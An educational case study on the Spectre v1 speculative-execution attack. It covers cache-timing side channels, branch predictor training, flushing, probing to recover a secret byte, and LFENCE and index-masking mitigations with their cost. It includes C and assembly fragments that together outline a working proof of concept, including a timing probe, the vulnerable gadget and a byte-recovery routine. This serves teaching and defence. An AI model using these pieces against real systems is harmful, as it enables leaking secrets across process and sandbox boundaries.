Case Study 31-2: Spectre — How Speculative Execution Becomes a Security Vulnerability
The Attack That Changed How We Think About CPU Design
In January 2018, researchers disclosed Spectre and Meltdown — two classes of vulnerabilities that affected virtually every high-performance CPU manufactured in the previous two decades. The vulnerabilities were not bugs in the traditional sense. The CPUs were working exactly as designed. The design itself was the vulnerability.
Understanding Spectre requires understanding speculative execution. This case study traces the exact mechanism of Spectre variant 1, explains why it works, and examines why its mitigations are expensive.
Background: The Timing Side Channel
A side channel is an observable effect of a computation that leaks information without being the computation's intended output. The primary side channel in Spectre is the cache timing channel: an attacker can determine whether a specific memory address was recently accessed by measuring how long it takes to access that address. An L1 cache hit takes ~4 cycles; a miss that goes all the way to main memory takes ~100 cycles or more. The difference is directly measurable.
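// Timing probe: measure access time to an address (x86-64, GCC/Clang inline asm)
#include <stdint.h>

uint64_t time_access(volatile uint8_t *addr) {
    uint32_t lo, hi;
    uint64_t start, end;
    // mfence + lfence: let earlier memory operations finish before the first timestamp
    asm volatile("mfence; lfence; rdtsc" : "=a"(lo), "=d"(hi) :: "memory");
    start = ((uint64_t)hi << 32) | lo;
    volatile uint8_t temp = *addr;   // the access being timed
    (void)temp;
    // lfence: wait for the load to complete before the second timestamp
    asm volatile("lfence; rdtsc" : "=a"(lo), "=d"(hi) :: "memory");
    end = ((uint64_t)hi << 32) | lo;
    return end - start;
}
// If time < 50 cycles → cache hit → address was recently accessed
// If time > 100 cycles → cache miss → address was NOT recently accessed
// (the exact thresholds are machine-dependent)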
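The 50-cycle cutoff is machine-dependent, so an attacker would normally calibrate it first. The following is a minimal sketch of one way to do that, assuming two sets of latencies (known hits and known misses) have already been collected with time_access. The helper names median_u64 and pick_threshold are hypothetical and not part of the original code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* qsort comparator for uint64_t values */
static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of up to 64 samples (n >= 1); the input array is not modified.
   Extra samples beyond 64 are ignored in this sketch. */
static uint64_t median_u64(const uint64_t *samples, size_t n) {
    uint64_t tmp[64];
    if (n > 64) n = 64;
    memcpy(tmp, samples, n * sizeof tmp[0]);
    qsort(tmp, n, sizeof tmp[0], cmp_u64);
    return tmp[n / 2];
}

/* Hypothetical helper: place the threshold halfway between the typical
   hit latency and the typical miss latency. */
static uint64_t pick_threshold(const uint64_t *hits, size_t nh,
                               const uint64_t *misses, size_t nm) {
    uint64_t h = median_u64(hits, nh);
    uint64_t m = median_u64(misses, nm);
    if (m <= h) return h;            /* degenerate calibration: no usable gap */
    return h + (m - h) / 2;
}
```

Medians are used rather than means so that a single outlier (an interrupt during a measurement, for instance) does not shift the threshold.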
The Spectre v1 Attack
The setup:
- A victim program has an array named array and a bounds check on the index: if (x < array_size) { ... }
- The victim also has a probe_array[256 * 64] (256 cache-line-spaced entries)
- An attacker can call the victim's function with attacker-controlled x
The vulnerable code pattern:
// victim.c
#include <stddef.h>
#include <stdint.h>

uint8_t array[256] = { /* some data */ };
uint8_t probe_array[256 * 64];
size_t array_size = 256;

// The vulnerable function:
uint8_t read_secret(size_t x) {
    if (x < array_size) {                    // bounds check
        return probe_array[array[x] * 64];   // memory access
    }
    return 0;
}
Step 1: Train the branch predictor
The attacker calls read_secret(valid_index) many times with valid indices. The branch predictor learns that the bounds check almost always passes, so it will predict the in-bounds path on the next call.
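Why repeated valid calls matter can be seen with a toy predictor. The sketch below models a single 2-bit saturating counter, which is a textbook simplification; real branch predictors are far more elaborate, and every name here is illustrative rather than taken from the original code.

```c
#include <stdbool.h>
#include <stddef.h>

/* Toy 2-bit saturating counter: states 0..1 predict "out of bounds",
   states 2..3 predict "in bounds". Not a model of any real CPU. */
typedef struct { unsigned state; } predictor_t;

static bool predict_in_bounds(const predictor_t *p) {
    return p->state >= 2;
}

/* Move the counter one step toward the observed outcome. */
static void update(predictor_t *p, bool was_in_bounds) {
    if (was_in_bounds) {
        if (p->state < 3) p->state++;
    } else {
        if (p->state > 0) p->state--;
    }
}

/* Run the bounds check for index x through the predictor.
   Returns true if the prediction made beforehand was wrong. */
static bool run_check(predictor_t *p, size_t x, size_t array_size) {
    bool predicted = predict_in_bounds(p);
    bool actual = x < array_size;
    update(p, actual);
    return predicted != actual;
}
```

After a few in-bounds calls the counter saturates at 3. The first out-of-bounds call is then mispredicted, and that misprediction is the window the attack relies on.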
Step 2: Flush the probe array from cache
The attacker flushes all 256 cache lines of probe_array:
; CLFLUSH: flush a cache line
clflush [probe_array + 0*64]
clflush [probe_array + 1*64]
; ... 256 flushes total ...
clflush [probe_array + 255*64]
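The same flush can be written as a loop in C. This is a minimal sketch assuming an x86-64 compiler that provides the _mm_clflush intrinsic from <emmintrin.h>; on other targets the macro below is only a placeholder and flushes nothing. The names FLUSH_LINE and flush_probe_array are illustrative.

```c
#include <stddef.h>
#include <stdint.h>
#if defined(__x86_64__) || defined(_M_X64)
#include <emmintrin.h>               /* _mm_clflush (SSE2) */
#define FLUSH_LINE(p) _mm_clflush(p)
#else
#define FLUSH_LINE(p) ((void)(p))    /* placeholder: no flush on other targets */
#endif

#define LINE_SIZE 64                 /* assumed cache line size in bytes */
#define NUM_LINES 256                /* one line per possible byte value */

static uint8_t probe_array[NUM_LINES * LINE_SIZE];

/* Issue a flush for every probe line; returns the number of lines visited. */
static size_t flush_probe_array(void) {
    size_t visited = 0;
    for (size_t i = 0; i < NUM_LINES; i++) {
        FLUSH_LINE(&probe_array[i * LINE_SIZE]);
        visited++;
    }
    return visited;
}
```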
Step 3: Speculatively read the secret
The attacker calls read_secret(x) where x is an invalid index pointing to a secret byte outside array (e.g., x = secret_ptr - &array[0]).
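The index computation can be sketched as follows. The helper names are hypothetical, and the arithmetic is done on integer addresses because subtracting pointers into different objects is undefined behaviour in C.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: the index x such that array + x lands on target.
   If target lies below array in memory, the unsigned subtraction wraps
   around, and adding x to the base wraps back to the same address. */
static size_t malicious_index(const uint8_t *array, const uint8_t *target) {
    return (size_t)((uintptr_t)target - (uintptr_t)array);
}

/* Address that the victim's array[x] would touch, in integer arithmetic. */
static uintptr_t touched_address(const uint8_t *array, size_t x) {
    return (uintptr_t)array + x;
}
```

Because the secret lies outside array, the resulting x is never a valid index: it is either larger than the array or a very large wrapped value, and in both cases it fails the architectural bounds check.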
The CPU evaluates the branch:
1. Checks: is x < array_size?
2. Branch predictor says "YES, it is less than array_size" (from training in Step 1)
3. CPU speculatively executes probe_array[array[x] * 64] while the comparison completes (the window is widest when array_size is not cached and must be fetched from memory)
4. The speculative load reads array[x] — which is the SECRET BYTE
5. Multiplies by 64, uses as index into probe_array
6. LOADS probe_array[secret_byte * 64] — brings this cache line into the L1 cache
7. Actual comparison completes: x >= array_size is true
8. CPU SQUASHES the speculative execution: rolls back rax, rbx, etc.
9. BUT: the cache now has probe_array[secret_byte * 64] loaded. This is NOT rolled back.
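The steps above can be condensed into a toy model that separates architectural state (rolled back) from cache state (not rolled back). This is purely an illustration under simplifying assumptions: the machine_t type, its single register, and the boolean cache map are invented for the sketch and do not describe a real CPU.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define LINES 256

/* Toy machine: one architectural register plus a record of which
   probe lines are cached. */
typedef struct {
    uint64_t rax;          /* architectural state: restored on squash */
    bool cached[LINES];    /* microarchitectural state: never restored */
} machine_t;

/* Model one call to read_secret(x) with the branch predicted in-bounds.
   memory stands in for the bytes reachable from the array base. */
static void speculative_call(machine_t *m, const uint8_t *memory,
                             size_t x, size_t array_size) {
    uint64_t saved_rax = m->rax;     /* checkpoint taken at the branch */

    /* Speculative path: runs before the comparison resolves. */
    uint8_t value = memory[x];       /* steps 4-5: read array[x] */
    m->cached[value] = true;         /* step 6: probe line is filled */
    m->rax = value;

    if (!(x < array_size)) {         /* step 7: the check resolves */
        m->rax = saved_rax;          /* step 8: squash the register state */
        /* step 9: m->cached is deliberately left untouched */
    }
}
```

After an out-of-bounds call, rax holds its old value again, yet exactly one entry of cached is set, and its index equals the byte that was read.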
Step 4: Extract the secret via cache timing
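// Attacker probes each entry and keeps the fastest one below the hit threshold:
int secret = -1;                     // -1 means no cache hit was observed
uint64_t min_time = UINT64_MAX;
for (int i = 0; i < 256; i++) {
    uint64_t t = time_access(&probe_array[i * 64]);
    if (t < 50 && t < min_time) {    // cache hit, and the fastest so far
        min_time = t;
        secret = i;                  // candidate value of the secret byte
    }
}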
One probe array entry is in cache; the others are not. The fast access reveals which value array[x] had — the secret byte.
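A single round is noisy in practice, so an attacker would typically repeat the flush, speculate, and probe sequence and tally the results. The sketch below assumes a hypothetical callback that performs one such round and reports which value hit, or -1 for none. The scripted_round stand-in only replays a fixed list of outcomes so the tally can be tried without real timing.

```c
#include <stddef.h>

#define VALUES 256

/* Hypothetical callback: performs one attack round and returns the byte
   value whose probe line was a cache hit, or -1 if none was seen. */
typedef int (*probe_round_fn)(void *ctx);

/* Run `rounds` attack rounds and return the most frequently observed
   value, or -1 if no round produced a hit. */
static int recover_byte(probe_round_fn probe_round, void *ctx, int rounds) {
    int score[VALUES] = {0};
    for (int r = 0; r < rounds; r++) {
        int v = probe_round(ctx);
        if (v >= 0 && v < VALUES) score[v]++;
    }
    int best = -1, best_score = 0;
    for (int v = 0; v < VALUES; v++) {
        if (score[v] > best_score) {
            best_score = score[v];
            best = v;
        }
    }
    return best;
}

/* Stand-in round for experimenting without hardware timing: replays a
   fixed script of outcomes, then reports -1 once the script runs out. */
typedef struct { const int *outcomes; size_t len, pos; } script_t;

static int scripted_round(void *ctx) {
    script_t *s = ctx;
    return s->pos < s->len ? s->outcomes[s->pos++] : -1;
}
```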
The Attack in Assembly
; Spectre gadget (what the CPU executes speculatively):
; rbx = x (attacker-controlled, out-of-bounds)
; rsi = array base
; r8 = probe_array base
;
; Before getting here: bounds check predicted in-bounds (out-of-bounds in reality)
movzx rax, byte [rsi + rbx] ; load array[x] → rax (secret byte)
shl rax, 6 ; multiply by 64 (cache line size)
movzx rax, byte [r8 + rax] ; load probe_array[secret * 64]
; This last load brings one cache line into cache.
; When the CPU squashes this (bounds check failed),
; everything is rolled back EXCEPT the cache state.
The Mitigation: LFENCE
; Mitigated version:
cmp rbx, [array_size]       ; compare x with the value stored in array_size
jae .out_of_bounds
lfence                      ; speculation barrier: later instructions wait for the check
movzx rax, byte [rsi + rbx] ; now this is safe: the branch has resolved
; ... rest of code ...
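As documented for Intel CPUs, LFENCE does not execute until all prior instructions have completed locally, and no later instruction begins execution until LFENCE itself completes. The prior instructions include the cmp and the jae, so the bounds check is resolved before the load of array[x] can start. This breaks the attack: a mispredicted bounds check can no longer feed an out-of-bounds byte into the cache.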
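At the C level the same fence can be requested with an intrinsic. The following is a minimal sketch assuming an x86-64 compiler that provides _mm_lfence in <emmintrin.h>; the SPECULATION_BARRIER macro and the function name read_secret_fenced are illustrative, and on other architectures the macro is an empty placeholder that provides no protection. The compiler is also not obliged to emit exactly the instruction sequence shown in the assembly listing.

```c
#include <stddef.h>
#include <stdint.h>
#if defined(__x86_64__) || defined(_M_X64)
#include <emmintrin.h>                      /* _mm_lfence (SSE2) */
#define SPECULATION_BARRIER() _mm_lfence()
#else
/* Placeholder only: other architectures need their own barrier. */
#define SPECULATION_BARRIER() ((void)0)
#endif

static uint8_t array[256];
static uint8_t probe_array[256 * 64];
static size_t array_size = 256;

/* Same logic as read_secret, with a fence between the check and the loads. */
uint8_t read_secret_fenced(size_t x) {
    if (x < array_size) {
        SPECULATION_BARRIER();   /* the check must resolve before the loads run */
        return probe_array[array[x] * 64];
    }
    return 0;
}
```

The architectural behaviour is unchanged: valid indices return the same byte as before, and invalid ones return 0.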
The Cost
Without LFENCE (vulnerable):
100 million calls to read_secret: 312 ms
With LFENCE (mitigated):
100 million calls to read_secret: 389 ms
Overhead: 24.7%
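The overhead figure follows directly from the two timings. A small sketch of the arithmetic, with illustrative function names:

```c
/* Relative overhead, in percent, of a mitigated run over a baseline run. */
static double overhead_percent(double baseline_ms, double mitigated_ms) {
    return (mitigated_ms - baseline_ms) / baseline_ms * 100.0;
}

/* Extra cost per call in nanoseconds, given total times in milliseconds. */
static double extra_ns_per_call(double baseline_ms, double mitigated_ms,
                                double calls) {
    return (mitigated_ms - baseline_ms) * 1e6 / calls;
}
```

With 312 ms and 389 ms over 100 million calls, the difference is 77 ms, which is about 24.7% of the baseline and roughly 0.77 ns of added time per call.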
This roughly 25% overhead is why Spectre mitigations are contentious. A web browser's JavaScript JIT compiler generates code for untrusted JavaScript and needs a bounds check on every array access, so fencing each check can be significant. Operating system kernels face the same problem wherever a system call uses a user-controlled value as an index; barriers on those paths add a cost that is measurable in every syscall-heavy workload.
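Because of this cost, a commonly used alternative to a fence is index masking, the idea behind the Linux kernel's array_index_nospec: the index is forced to zero by data-dependent arithmetic whenever it is out of range, so even a mispredicted path reads only in-bounds data. This is a different technique from the LFENCE mitigation shown earlier. The sketch below is an illustration under stated assumptions, not the kernel's implementation: index_mask and HIDE_FROM_OPTIMIZER are hypothetical names, and the empty inline asm (GCC/Clang only) is there because an optimizing compiler may otherwise prove the mask redundant and delete it.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

#if defined(__GNUC__)
/* Make the compiler forget what it knows about v (GCC/Clang extension). */
#define HIDE_FROM_OPTIMIZER(v) __asm__ volatile("" : "+r"(v))
#else
#define HIDE_FROM_OPTIMIZER(v) ((void)0)   /* placeholder: no protection */
#endif

static uint8_t array[256];
static uint8_t probe_array[256 * 64];
static size_t array_size = 256;

/* All-ones if index < size, zero otherwise, computed without a branch.
   Valid for size <= SIZE_MAX / 2 + 1: the top bit of
   index | (size - 1 - index) is set exactly when index >= size. */
static size_t index_mask(size_t index, size_t size) {
    size_t v = index | (size - 1 - index);
    return (v >> (sizeof(size_t) * CHAR_BIT - 1)) - 1;
}

uint8_t read_secret_masked(size_t x) {
    if (x < array_size) {
        HIDE_FROM_OPTIMIZER(x);
        x &= index_mask(x, array_size);   /* becomes 0 on a mispredicted path */
        return probe_array[array[x] * 64];
    }
    return 0;
}
```

The mask costs a few arithmetic instructions and does not stall the pipeline the way a fence does, which is the usual reason for preferring it on hot paths.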
Broader Lessons
Spectre changed the fundamental contract of CPU performance optimization:
Before Spectre: Speculative execution is invisible. The programmer sees only sequential execution semantics. Performance optimizations that use speculation are free.
After Spectre: Speculation is visible through side channels. Any computation that happens speculatively can leak information, even if it is architecturally squashed. Security-sensitive code must explicitly limit speculation (LFENCE, serializing instructions) at security boundaries.
The performance cost of Spectre mitigations is a permanent tax on every system call, every privileged operation, every execution across a security boundary. Modern CPUs now include hardware mitigations that reduce (but do not eliminate) this tax — but the fundamental tension between performance and security remains. Speculative execution will continue to create new variants as long as CPUs speculate, and mitigations will continue to cost performance.
🔐 Security Note: Spectre affects not just operating systems but any software that executes code from multiple security domains: web browsers (JavaScript execution), virtual machines (guest code), and JIT compilers. Google's Chromium browser deployed site isolation (separate processes per site) partly in response to Spectre, accepting significant memory overhead to eliminate the cross-origin speculative access risk.